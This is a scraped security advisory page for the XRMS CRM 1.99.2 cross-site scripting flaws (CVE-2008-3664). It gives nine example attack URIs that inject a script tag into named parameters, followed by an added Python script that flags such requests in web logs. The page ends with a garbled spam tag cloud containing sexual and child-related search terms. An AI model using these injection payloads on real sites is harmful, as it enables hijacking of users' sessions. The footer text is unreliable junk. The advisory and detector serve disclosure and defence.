Title XRMS CRM Multiple Input Validation Vulnerabilities
Published 2008-09-04-12:00AM
Updated 2008-09-04-04:24PM
Class Input Validation Error
CVE   CVE-2008-3664
Remote  Yes
Local  No
Credit  Fabian Fingerle
Vulnerable  XRMS CRM XRMS 1.99.2
Not Vulnerable  
Code  Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI. The following example URIs are available to demonstrate the cross-site scripting issues:
http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
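
For triage on a host running the affected version, the script/parameter pairs listed above can be checked against request URIs pulled from web server logs. This is an added example, not part of the advisory or of XRMS; it assumes the application is served under /xrms as in the example URIs, and the function names and sample requests are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Path prefix -> parameter, taken from the advisory's example URIs.
# "some.php" there stands for scripts in that directory, so match by directory.
AFFECTED = {
    "/xrms/login.php": "target",
    "/xrms/activities/": "title",
    "/xrms/companies/": "company_name",
    "/xrms/contacts/": "last_name",
    "/xrms/campaigns/": "campaign_title",
    "/xrms/opportunities/": "opportunity_title",
    "/xrms/cases/": "case_title",
    "/xrms/files/": "file_id",
    "/xrms/reports/custom/mileage.php": "starting",
}
# Characters needed to break out of an HTML attribute and open a tag.
MARKUP_CHARS = set('"<>')

def flag_request(uri):
    """Return (path, param, decoded_value) for a suspicious request, else None."""
    parts = urlsplit(uri)
    for prefix, param in AFFECTED.items():
        if not parts.path.startswith(prefix):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again so double-encoded
            # values are also surfaced for review.
            decoded = unquote(value)
            if name == param and MARKUP_CHARS & set(decoded):
                return (parts.path, name, decoded)
    return None

def triage(uris):
    """Return the hits for every request URI that matches."""
    return [hit for hit in map(flag_request, uris) if hit]

# Constructed sample request URIs (not real log data).
SAMPLE = [
    "/xrms/login.php?target=%22%3E%3Cscript%3Ealert(1)%3B%3C/script%3E",
    "/xrms/contacts/some.php?last_name=Fingerle",
    "/xrms/companies/one.php?company_name=Acme+%26+Sons",
    "/xrms/files/some.php?file_id=%2522%253E",
    "/xrms/login.php?user=%3Cb%3E",
]

if __name__ == "__main__":
    for path, name, value in triage(SAMPLE):
        print(f"{path}: parameter {name!r} carries markup: {value!r}")
```

A hit shows that markup reached one of the listed parameters, not that it was reflected unescaped; confirm against the response or the installed XRMS version.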
Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:37:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.seks.c XDOMAIN.BL excessive exabyte.co DataLife news for c Crack Data emails ethics and cisco ios njfghj.com apache 1.3 www.zhangt WWW.BBC UR n...etup[u Joomla Inc news for c www.nmgcyw ways to un 200 /compo CMS is Fre www.saniya zapakmail my.kjxy.hn mambo Remo news for C news for c &a BF VIDIO Apche 2.0 news for c zeroboard. news for / naked kids Messenger www.gerlet CVE 2004 1 Www.Video www.ya-yi- free sexy www.zzdown www.horse Toenda ethereal+9 pune servi news for c Kareenakap vide sex eshop6167. http;//tra